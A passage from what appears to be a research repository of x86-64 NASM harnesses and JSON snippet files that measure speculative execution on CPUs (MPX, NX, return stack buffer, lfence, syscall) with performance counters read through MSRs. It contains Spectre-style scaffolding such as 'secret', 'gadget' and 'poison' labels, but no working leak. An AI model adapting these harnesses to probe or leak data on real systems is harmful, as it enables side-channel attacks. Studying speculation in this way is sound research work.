previous sigaction (no) 56 | mov r10, NSIG_WORDS ; sigsetsize 57 | syscall 58 | cmp eax, 0 59 | %endmacro 60 | 61 | %macro print 2 62 | mov rax, SYS_WRITE 63 | mov rdi, 1 ; stdout 64 | mov rsi, %1 65 | mov rdx, %2 ;len 66 | syscall 67 | %endmacro 68 | 69 | section .data 70 | warmup_cnt: dq 1 71 | 72 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 73 | msg_bounds: db "mpx bounds", 0xA, 0 74 | fd: dq 0 75 | val: dq 0 76 | len: equ $-val 77 | 
array: times 40 db 0 78 | ALIGN 64 79 | xstate: times 0x1000 db 0 80 | SIGACTION sigaction 81 | ;##### DATA STARTS HERE ######## 82 | 83 | ;##### DATA ENDS HERE ######## 84 | 85 | section .bss 86 | 87 | section .text 88 | global perf_test_entry:function 89 | 90 | perf_test_entry: 91 | push rbp 92 | mov rbp, rsp 93 | sub rsp, len 94 | 95 | check_pinning VICTIM_PROCESS 96 | ; signal handler 97 | setup_signal_handler 98 | jne .exit 99 | 100 | msr_open 101 | msr_seek 102 | 103 | ; mpx setup 104 | setup_mpx 105 | ; setup bounds 106 | lea rax, [array] 107 | bndmk bnd1, [rax+10] ; make bounds 108 | 109 | .data: 110 | clflush [warmup_cnt] 111 | lfence 112 | reset_counter 113 | start_counter 114 | 115 | ; mpx stuff below 116 | lea r11, [array] 117 | add r11, [warmup_cnt] 118 | bndcl bnd1, [r11] ; check lower 119 | bndcu bnd1, [r11] ; check upper 120 | ;##### SNIPPET STARTS HERE ###### 121 | 122 | ;##### SNIPPET ENDS HERE ###### 123 | lea r8, [rel msg_bounds] 124 | 125 | .else: 126 | lfence 127 | stop_counter 128 | 129 | inc QWORD[warmup_cnt] 130 | cmp QWORD[warmup_cnt], 13 131 | jl .data 132 | .exit: 133 | msr_close 134 | exit 0 135 | 136 | ; rdi=signum, rsi=siginfo_t*, rdx=sigcontext* 137 | handler: 138 | ; trap number should be 5 for TRAP_BR 139 | mov r10,[rdx+UCONTEXT_STRUC.uc_mcontext+SIGCONTEXT_STRUC.trapno] 140 | cmp r10, 5 141 | jne .exit 142 | push rdx 143 | print msg_bounds, 12 144 | ; set RIP to continue after the fault 145 | pop rdx 146 | mov r10, QWORD(perf_test_entry.else) 147 | mov [rdx+UCONTEXT_STRUC.uc_mcontext+SIGCONTEXT_STRUC.rip], r10 148 | .exit: 149 | ret 150 | 151 | restorer: 152 | mov rax, SYS_RT_SIGRETURN 153 | syscall 154 | -------------------------------------------------------------------------------- /examples/mpx/spec_length.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | 9 | "fnop", 10 | "fnop", 11 | "fnop", 12 | 
"fnop", 13 | "fnop", 14 | "fnop", 15 | "fnop", 16 | "fnop", 17 | "fnop", 18 | "fnop", 19 | "fnop", 20 | "fnop", 21 | "fnop", 22 | "fnop", 23 | "fnop", 24 | "fnop", 25 | "fnop", 26 | "fnop", 27 | "fnop", 28 | "fnop", 29 | "fnop", 30 | "fnop", 31 | "fnop", 32 | "fnop", 33 | "fnop", 34 | "fnop", 35 | "fnop", 36 | "fnop", 37 | "fnop", 38 | "fnop", 39 | "fnop", 40 | "fnop", 41 | "fnop", 42 | "fnop", 43 | "fnop", 44 | "fnop", 45 | "fnop", 46 | "fnop", 47 | "fnop", 48 | "fnop", 49 | "fnop", 50 | "fnop", 51 | "fnop", 52 | "fnop", 53 | "fnop", 54 | "fnop", 55 | "fnop", 56 | "fnop", 57 | "fnop", 58 | "fnop", 59 | "fnop", 60 | "fnop", 61 | "fnop", 62 | "fnop", 63 | "fnop", 64 | "fnop", 65 | "fnop", 66 | "fnop", 67 | "fnop", 68 | "fnop", 69 | "fnop", 70 | "fnop", 71 | "fnop", 72 | "fnop", 73 | "fnop", 74 | "fnop", 75 | "fnop", 76 | "fnop", 77 | "fnop", 78 | "fnop", 79 | "fnop", 80 | "fnop", 81 | "fnop", 82 | "fnop", 83 | "fnop", 84 | "fnop", 85 | "fnop", 86 | "fnop", 87 | "fnop", 88 | "fnop", 89 | "fnop", 90 | "fnop", 91 | "fnop", 92 | "fnop", 93 | "fnop", 94 | "fnop", 95 | "fnop", 96 | "fnop", 97 | "fnop", 98 | "fnop", 99 | "fnop", 100 | "fnop", 101 | "fnop", 102 | "fnop", 103 | "fnop", 104 | "fnop", 105 | "fnop", 106 | "fnop", 107 | "fnop", 108 | "fnop", 109 | "fnop", 110 | "fnop", 111 | "fnop", 112 | "fnop", 113 | "fnop", 114 | "fnop", 115 | "fnop", 116 | "fnop", 117 | "fnop", 118 | "fnop", 119 | "fnop", 120 | "fnop", 121 | "fnop", 122 | "fnop", 123 | "fnop", 124 | "fnop", 125 | "fnop", 126 | "fnop", 127 | "fnop", 128 | "fnop", 129 | "fnop", 130 | "fnop", 131 | "fnop", 132 | "fnop", 133 | "fnop", 134 | "fnop", 135 | "fnop", 136 | "fnop", 137 | "fnop", 138 | "fnop", 139 | "fnop", 140 | "fnop", 141 | "fnop", 142 | "fnop", 143 | "fnop", 144 | "fnop", 145 | "fnop", 146 | "fnop", 147 | "fnop", 148 | "fnop", 149 | "fnop", 150 | "fnop", 151 | "fnop", 152 | "fnop", 153 | "fnop", 154 | "fnop", 155 | "fnop", 156 | "fnop", 157 | "fnop", 158 | "fnop", 159 | "fnop", 160 | "fnop", 161 | 
"fnop", 162 | "fnop", 163 | "fnop", 164 | "fnop", 165 | "fnop", 166 | "fnop", 167 | "fnop", 168 | "fnop", 169 | "fnop", 170 | "fnop", 171 | "fnop", 172 | "fnop", 173 | "fnop", 174 | "fnop", 175 | "fnop", 176 | "fnop", 177 | "fnop", 178 | "fnop", 179 | "fnop", 180 | "fnop", 181 | "fnop", 182 | "fnop", 183 | "fnop", 184 | "fnop", 185 | "fnop", 186 | "fnop", 187 | "fnop", 188 | "fnop", 189 | "fnop", 190 | "fnop", 191 | "fnop", 192 | "fnop", 193 | "fnop", 194 | "fnop", 195 | "fnop", 196 | "fnop", 197 | "fnop", 198 | "fnop", 199 | "fnop", 200 | "fnop", 201 | "fnop", 202 | "fnop", 203 | "fnop", 204 | "fnop", 205 | "fnop", 206 | "fnop", 207 | "fnop", 208 | "fnop", 209 | "fnop", 210 | "fnop", 211 | "fnop", 212 | "fnop", 213 | "fnop", 214 | "fnop", 215 | "fnop", 216 | "fnop", 217 | "fnop", 218 | "fnop", 219 | "fnop", 220 | "fnop", 221 | "fnop", 222 | "fnop", 223 | "fnop", 224 | "fnop", 225 | "fnop", 226 | "fnop", 227 | "fnop", 228 | "fnop", 229 | "fnop", 230 | "fnop", 231 | "fnop", 232 | "fnop", 233 | "fnop", 234 | "fnop", 235 | "fnop", 236 | "fnop", 237 | "fnop", 238 | "fnop", 239 | "fnop", 240 | "fnop", 241 | "fnop", 242 | "fnop", 243 | "fnop", 244 | "fnop", 245 | "fnop", 246 | "fnop", 247 | "fnop", 248 | "fnop", 249 | "fnop", 250 | "fnop" 251 | ] 252 | } 253 | -------------------------------------------------------------------------------- /examples/nx/nx.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %define SYS_MMAP 9 17 | %define SYS_MPROT 10 18 | %define SYS_EXIT 60 19 | %define SYS_WRITE 1 20 | %define SYS_OPEN 2 21 | %define SYS_CLOSE 3 22 | %define SYS_LSEEK 8 23 | %define SYS_GETCPU 309 24 | %define SYS_PREAD64 17 25 | %define SYS_PWRITE64 18 26 | %define SYS_RT_SIGACTION 13 27 | %define SYS_RT_SIGRETURN 15 28 | %define PROT_READ 0x1 29 | %define PROT_WRITE 0x2 30 | %define PROT_EXEC 0x4 31 | %define CHILD_PROCESS 0 32 | 33 | %include "signals.inc" 34 | %include "common.inc" 35 | %include "pmc.inc" 36 | 37 | ; clobbers rax, rdi, rsi, rdx, r8-10 38 | ; params: address + length 39 | %macro allocate 3 40 | mov rax, SYS_MMAP ; mmap 41 | mov rdi, %1 ; address 42 | mov rsi, %2 ; len 43 | mov rdx, %3 ; prot 44 | mov r10, 0x22 ; flags MAP_ANONYMOUS|MAP_PRIVATE 45 | mov r8, -1 ; fd 46 | mov r9, 0 ; offset 47 | syscall 48 | cmp rax, -1 49 | je perf_test_entry.exit 50 | %endmacro 51 | 52 | %macro mprot 3 53 | mov rax, SYS_MPROT 54 | mov rdi, %1 55 | mov rsi, %2 56 | mov rdx, %3 57 | syscall 58 | cmp rax, -1 59 | je perf_test_entry.exit 60 | %endmacro 61 | 62 | ; sys_rt_sigaction - alter an action taken by a process 63 | ; @sig: signal to be sent 64 | ; @act: new sigaction 65 | ; @oact: used to save the previous sigaction 66 | ; @sigsetsize: size of sigset_t type 67 | 68 | %macro setup_signal_handler 0 69 | mov QWORD [sigaction.sa_handler], handler 70 | mov QWORD [sigaction.sa_restorer], restorer 71 | mov eax, SA_RESTART | SA_RESTORER | SA_SIGINFO 72 | mov DWORD [sigaction.sa_flags], eax 73 | mov rax, SYS_RT_SIGACTION ; system call number 74 | mov rdi, SIGSEGV ; signal number 75 | lea rsi, [sigaction] ; sigaction struct 76 | xor rdx, rdx ; save previous sigaction (no) 77 | mov r10, NSIG_WORDS ; sigsetsize 78 | syscall 79 | cmp eax, 0 80 | %endmacro 81 | 82 | 83 | section .data 84 | warmup_cnt: dq 1 85 | fill1: times 62 db 0 86 | 
array: times 64 db 0 87 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 88 | trap_msg: db "trap", 0xA, 0 89 | fd: dq 0 90 | val: dq 0 91 | len: equ $-val 92 | target: dq 0 93 | ALIGN 64 94 | xstate: times 0x1000 db 0 95 | SIGACTION sigaction 96 | ;##### DATA STARTS HERE ######## 97 | 98 | ;##### DATA ENDS HERE ######## 99 | 100 | section .bss 101 | 102 | section .note.GNU-stack noalloc noexec nowrite progbits 103 | 104 | section .text 105 | global perf_test_entry:function 106 | global snippet:function 107 | global handler:function 108 | global restorer:function 109 | 110 | perf_test_entry: 111 | push rbp 112 | mov rbp, rsp 113 | sub rsp, len 114 | 115 | check_pinning VICTIM_PROCESS 116 | 117 | msr_open 118 | msr_seek 119 | 120 | allocate 0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC 121 | ; save the target 122 | mov [target], rax 123 | 124 | copy rax, snippet, snippet.end-snippet 125 | 126 | ; get data into cache 127 | mov rax, [target+0x8] 128 | ; execute once 129 | call [target] 130 | 131 | ; remove exec + write permissions 132 | mprot [target], 0x1000, PROT_READ 133 | 134 | setup_signal_handler 135 | 136 | .data: 137 | clflush [warmup_cnt] 138 | lfence 139 | reset_counter 140 | start_counter 141 | mov ebx, DWORD[warmup_cnt] 142 | cmp ebx, 12 143 | je .else 144 | call [target] 145 | 146 | .else: 147 | lfence 148 | stop_counter 149 | 150 | inc QWORD[warmup_cnt] 151 | cmp QWORD[warmup_cnt], 13 152 | jl .data 153 | .exit: 154 | msr_close 155 | exit 0 156 | 157 | ; rdi=signum, rsi=siginfo_t*, rdx=sigcontext* 158 | handler: 159 | mov r10,[rdx+UCONTEXT_STRUC.uc_mcontext+SIGCONTEXT_STRUC.trapno] 160 | cmp r10, 14 161 | jne .exit 162 | 163 | ; set RIP to continue after the fault 164 | print trap_msg, 5 165 | mov r10, QWORD(perf_test_entry.else) 166 | mov [rdx+UCONTEXT_STRUC.uc_mcontext+SIGCONTEXT_STRUC.rip], r10 167 | .exit: 168 | ret 169 | 170 | restorer: 171 | mov rax, SYS_RT_SIGRETURN 172 | syscall 173 | 174 | snippet: 175 | mulps xmm2, xmm1; marker 
instruction 176 | lea r8, [rel trap_msg] ; marker instruction 177 | ret 178 | .end: 179 | nop 180 | ;##### SNIPPET STARTS HERE ###### 181 | 182 | ;##### SNIPPET ENDS HERE ###### 183 | -------------------------------------------------------------------------------- /examples/nx/spec_length.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0" 4 | ], 5 | 6 | "INST": [ 7 | 8 | "fnop", 9 | "fnop", 10 | "fnop", 11 | "fnop" 12 | ] 13 | } 14 | -------------------------------------------------------------------------------- /examples/rsb/rsb_fill_deep_stack.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 
14 | 15 | [BITS 64] 16 | %define SYS_EXIT 60 17 | %define SYS_WRITE 1 18 | %define SYS_OPEN 2 19 | %define SYS_CLOSE 3 20 | %define SYS_LSEEK 8 21 | %define SYS_GETCPU 309 22 | %define SYS_PREAD64 17 23 | %define SYS_PWRITE64 18 24 | %define CHILD_PROCESS 0 25 | %define ATTACK_PROCESS 4 26 | 27 | %define BASE 0x10000000 28 | 29 | %include "common.inc" 30 | %include "pmc.inc" 31 | 32 | section .data 33 | 34 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 35 | fd: dq 0 36 | val: dq 0 37 | len: equ $-val 38 | array: resb 2048 39 | secret: db 0 40 | addr: dq 0 41 | align 1024 42 | addr2: dq 0 43 | counter: dq 0 44 | align 1024 45 | ;##### DATA STARTS HERE ######## 46 | 47 | ;##### DATA ENDS HERE ######## 48 | 49 | section .text 50 | global perf_test_entry:function 51 | global snippet:function 52 | global gadget:function 53 | global poison:function 54 | 55 | perf_test_entry: 56 | push rbp 57 | mov rbp, rsp 58 | sub rsp, 0 59 | 60 | check_pinning VICTIM_PROCESS ;# ATTACK_PROCESS 61 | msr_open 62 | msr_seek 63 | 64 | reset_counter 65 | 66 | call filler2 67 | 68 | start_counter 69 | 70 | call victim 71 | mov DWORD[array], eax 72 | mov DWORD[array+4], edx 73 | movq xmm0, QWORD[array] 74 | lfence 75 | 76 | align 1024 77 | victim: 78 | ;call myexit 79 | call filler 80 | push myexit 81 | clflush [rsp] 82 | lfence 83 | ret 84 | 85 | filler: 86 | ;##### SNIPPET STARTS HERE ###### 87 | 88 | ;##### SNIPPET ENDS HERE ###### 89 | ret 90 | 91 | align 1024 92 | filler2: 93 | callnext 94 | callnext 95 | callnext 96 | callnext 97 | callnext 98 | callnext 99 | callnext 100 | callnext 101 | callnext 102 | callnext 103 | callnext 104 | callnext 105 | callnext 106 | callnext 107 | callnext 108 | callnext 109 | ret 110 | 111 | align 1024 112 | myexit: 113 | stop_counter 114 | msr_close 115 | exit 0 116 | 117 | dummy: 118 | ret 119 | 120 | -------------------------------------------------------------------------------- /examples/rsb/rsb_fill_deep_stack.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | 9 | "callnext", 10 | "callnext", 11 | "callnext", 12 | "callnext", 13 | "callnext", 14 | "callnext", 15 | "callnext", 16 | "callnext", 17 | "callnext", 18 | "callnext", 19 | "callnext", 20 | "callnext", 21 | "callnext", 22 | "callnext", 23 | "callnext", 24 | "callnext", 25 | "callnext", 26 | "callnext", 27 | "callnext", 28 | "callnext", 29 | "callnext", 30 | "callnext" 31 | ] 32 | } 33 | -------------------------------------------------------------------------------- /examples/speculation_in_speculation/speculation_in_speculation_in_speculation.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 
14 | ; Harness: three nested compare-and-branch stages in front of the snippet slot, run 12 times between start_counter and stop_counter.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; first cache line (assumes .data starts 64-byte aligned; read and written as a DWORD, the upper bytes come from fill)
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 2 ; second cache line
24 | fill2: times 62 db 0
25 |
26 | warmup_cnt_fake2: db 1 ; third cache line
27 | fill3: times 63 db 0
28 |
29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; rest of the data; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening it needs the msr driver and elevated privileges
30 | fd: dq 0
31 | val: dq 0
32 | len: equ $-val ; len = 8, the size of val
33 | lea_array: times 40 db 0
34 | ;##### DATA STARTS HERE ########
35 |
36 | ;##### DATA ENDS HERE ########
37 |
38 | section .text
39 | global perf_test_entry:function
40 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
41 |
42 | perf_test_entry:
43 |     push rbp
44 |     mov rbp, rsp
45 |     sub rsp, len ; reserve len (8) bytes of stack
46 |
47 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
48 |     msr_open
49 |     msr_seek
50 | .data: ; loop head: a local code label, not the data section
51 |     clflush [warmup_cnt] ; evict the operand of the second compare
52 |     clflush [warmup_cnt_fake] ; evict the dividend of the first compare; warmup_cnt_fake2 is not flushed
53 |     mov eax, 0
54 |     cpuid ; serializing instruction ahead of the counted region
55 |     lfence
56 |     reset_counter
57 |     start_counter
58 |     mov edx, 0
59 |     mov ecx, 2048
60 |     mov eax, DWORD[warmup_cnt_fake]
61 |     div ecx
62 |     mov ecx, 2
63 |     xor edx, edx
64 |     div ecx ; eax = warmup_cnt_fake / 2048 / 2
65 |     cmp eax, 1 ; equal once warmup_cnt_fake has doubled from 2 to 4096, i.e. on pass 12
66 |     je .else
67 | .data2:
68 |     mov ebx, DWORD[warmup_cnt]
69 |     cmp ebx, 12 ; equal on pass 12, but the first je has already left by then
70 |     je .else2
71 | .data3:
72 |     mov ebx, DWORD[warmup_cnt_fake2]
73 |     cmp ebx, 12 ; warmup_cnt_fake2 also counts 1..12
74 |     je .else3
75 |     mov rax, 10
76 |     lea rax, [lea_array+rax*2] ; same mov/lea pair after every branch target below; presumably the instructions being counted (TODO confirm against the counter configuration)
77 | ;##### SNIPPET STARTS HERE ######
78 |
79 | ;##### SNIPPET ENDS HERE ######
80 | .else3:
81 |     mov rax, 10
82 |     lea rax, [lea_array+rax*2]
83 | .else2:
84 |     mov rax, 10
85 |     lea rax, [lea_array+rax*2]
86 | .else:
87 |     mov rax, 10
88 |     lea rax, [lea_array+rax*2]
89 |     lfence ; earlier instructions complete before the counter is stopped
90 |     stop_counter
91 |
92 |     mov ax, 2 ; NOTE(review): sets only AX; the 32-bit mul below uses all of EAX, so this relies on EAX[31:16] being 0 after stop_counter (confirm)
93 |     mul DWORD[warmup_cnt_fake]
94 |     mov DWORD[warmup_cnt_fake], eax ; warmup_cnt_fake doubles each pass
95 |     inc DWORD[warmup_cnt_fake2]
96 |     inc DWORD[warmup_cnt]
97 |     cmp DWORD[warmup_cnt], 13
98 |     jl .data ; warmup_cnt runs 1..12: twelve passes
99 |
100 |     msr_close
101 |     exit 0
102 |
--------------------------------------------------------------------------------
/examples/speculation_stopper/speculation_stopper.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: a conditional branch followed directly by lfence, then the snippet slot and a second branch; 12 passes between start_counter and stop_counter.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 |
21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0
23 | fd: dq 0
24 | warmup_cnt_fake: dd 1 ; never written in this file, so it stays 1
25 | offset: dq 0
26 | val: dq 0
27 | len: equ $-val ; len = 8, the size of val
28 | array: resb 128 ; NOTE(review): resb inside .data; NASM is expected to zero-fill this with a warning, "times 128 db 0" is the explicit form
29 | warmup_cnt: dd 1
30 | ;##### DATA STARTS HERE ########
31 |
32 | ;##### DATA ENDS HERE ########
33 |
34 | section .text
35 | global perf_test_entry:function
36 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
37 |
38 | perf_test_entry:
39 |     push rbp
40 |     mov rbp, rsp
41 |     sub rsp, len ; reserve len (8) bytes of stack
42 |
43 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
44 |     ;check_pinning ATTACKER_PROCESS
45 |     msr_open
46 |     msr_seek
47 | .data: ; loop head: a local code label, not the data section
48 |     clflush [warmup_cnt] ; evict the branch operand, so the load on line 54 misses the cache
49 |     mov eax, 0
50 |     cpuid ; serializing instruction ahead of the counted region
51 |     lfence
52 |     reset_counter
53 |     start_counter
54 |     mov ebx, DWORD[warmup_cnt]
55 |     cmp ebx, 12 ; warmup_cnt runs 1..12, so the je is taken only on the last pass
56 |     je .else
57 |     lfence ; the barrier under test: instructions after it wait until earlier ones have completed (on AMD only when lfence is configured as dispatch-serializing)
58 | ;##### SNIPPET STARTS HERE ######
59 |
60 | ;##### SNIPPET ENDS HERE ######
61 |     mov ebx, DWORD[warmup_cnt_fake]
62 |     cmp ebx, 12 ; warmup_cnt_fake is always 1, so this je is never taken architecturally
63 |     je .else
64 |     lfence
65 | .else:
66 |     lfence ; earlier instructions complete before the counter is stopped
67 |     stop_counter
68 |
69 |     inc DWORD[warmup_cnt]
70 |     cmp DWORD[warmup_cnt], 13
71 |     jl .data ; twelve passes
72 |
73 |     msr_close
74 |     exit 0
75 |
-------------------------------------------------------------------------------- /examples/speculation_stopper/speculation_stopper.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "fnop", 9 | "fnop", 10 | "fnop", 11 | "fnop", 12 | "fnop", 13 | "fnop", 14 | "fnop", 15 | "fnop", 16 | "fnop", 17 | "fnop", 18 | "fnop", 19 | "fnop", 20 | "fnop", 21 | "fnop", 22 | "fnop", 23 | "fnop", 24 | "fnop", 25 | "fnop", 26 | "fnop", 27 | "fnop", 28 | "fnop", 29 | "fnop", 30 | "fnop", 31 | "fnop", 32 | "fnop" 33 | ] 34 | } 35 | -------------------------------------------------------------------------------- /examples/syscall_speculation/syscall_speculation.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 
14 | ; Harness: conditional branch whose not-taken path issues a getppid syscall before the snippet slot; 12 passes between start_counter and stop_counter.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | %define SYS_GETPPID 110
20 | %define SYS_GETPID 39
21 | ; 110 and 39 are the Linux x86-64 numbers for getppid and getpid; SYS_GETPID is not used below.
22 | section .data
23 |
24 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
25 | fd: dq 0
26 | warmup_cnt_fake: dd 1
27 | offset: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | array: times 128 db 0
31 | warmup_cnt: dd 1
32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 | .data: ; loop head: a local code label, not the data section
49 |     clflush [warmup_cnt] ; evict the branch operand, so the load on line 55 misses the cache
50 |     mov eax, 0
51 |     cpuid ; serializing instruction ahead of the counted region
52 |     lfence
53 |     reset_counter
54 |     start_counter
55 |     mov ebx, DWORD[warmup_cnt]
56 |     cmp ebx, 12 ; warmup_cnt runs 1..12, so the je is taken only on the last pass
57 |     je .else
58 |     mov eax, SYS_GETPPID
59 |     syscall ; runs architecturally on passes 1..11; syscall overwrites rcx and r11, the result comes back in rax
60 | ;##### SNIPPET STARTS HERE ######
61 |
62 | ;##### SNIPPET ENDS HERE ######
63 |     lfence
64 | .else:
65 |     lfence ; earlier instructions complete before the counter is stopped
66 |     stop_counter
67 |
68 |     inc DWORD[warmup_cnt]
69 |     cmp DWORD[warmup_cnt], 13
70 |     jl .data ; twelve passes
71 |
72 |     msr_close
73 |     exit 0
74 |
--------------------------------------------------------------------------------
/examples/syscall_speculation/syscall_speculation.json:
--------------------------------------------------------------------------------
1 | {
2 |     "DATA": [
3 |         "something: dq 0",
4 |         "something2: dq 0"
5 |     ],
6 |
7 |     "INST": [
8 |         "mov ebx, eax",
9 |         "mov eax, ebx",
10 |         "mov ebx, eax",
11 |         "mov eax, ebx",
12 |         "mov ebx, eax",
13 |         "mov eax, ebx",
14 |         "mov ebx, eax",
15 |         "mov eax, ebx",
16 |         "mov ebx, ebx"
17 |     ]
18 | }
19 |
--------------------------------------------------------------------------------
/examples/syscall_speculation/syscall_speculation_baseline.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 | %include "common.inc"
3 | %include "pmc.inc"
4 | ; Baseline harness: same loop as syscall_speculation.asm with the syscall instruction commented out (line 44).
5 | %define SYS_GETPPID 110
6 | %define SYS_GETPID 39
7 | ; msr_*, *_counter and exit are not defined in this file; presumably they come from the includes.
8 | section .data
9 |
10 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
11 | fd: dq 0
12 | warmup_cnt_fake: dd 1
13 | offset: dq 0
14 | val: dq 0
15 | len: equ $-val ; len = 8, the size of val
16 | array: times 128 db 0
17 | warmup_cnt: dd 1
18 | ;##### DATA STARTS HERE ########
19 |
20 | ;##### DATA ENDS HERE ########
21 |
22 | section .text
23 | global perf_test_entry:function
24 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
25 |
26 | perf_test_entry:
27 |     push rbp
28 |     mov rbp, rsp
29 |     sub rsp, len ; reserve len (8) bytes of stack
30 | ; NOTE(review): no check_pinning call here, unlike syscall_speculation.asm, although dev_file still names CPU VICTIM_PROCESS_STR; confirm this is intended
31 |     msr_open
32 |     msr_seek
33 | .data: ; loop head: a local code label, not the data section
34 |     clflush [warmup_cnt] ; evict the branch operand, so the load on line 40 misses the cache
35 |     mov eax, 0
36 |     cpuid ; serializing instruction ahead of the counted region
37 |     lfence
38 |     reset_counter
39 |     start_counter
40 |     mov ebx, DWORD[warmup_cnt]
41 |     cmp ebx, 12 ; warmup_cnt runs 1..12, so the je is taken only on the last pass
42 |     je .else
43 |     mov eax, SYS_GETPPID
44 |     ;syscall
45 | ;##### SNIPPET STARTS HERE ######
46 |
47 | ;##### SNIPPET ENDS HERE ######
48 |     lfence
49 | .else:
50 |     lfence ; earlier instructions complete before the counter is stopped
51 |     stop_counter
52 |
53 |     inc DWORD[warmup_cnt]
54 |     cmp DWORD[warmup_cnt], 13
55 |     jl .data ; twelve passes
56 |
57 |     msr_close
58 |     exit 0
59 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_cached.asm:
--------------------------------------------------------------------------------
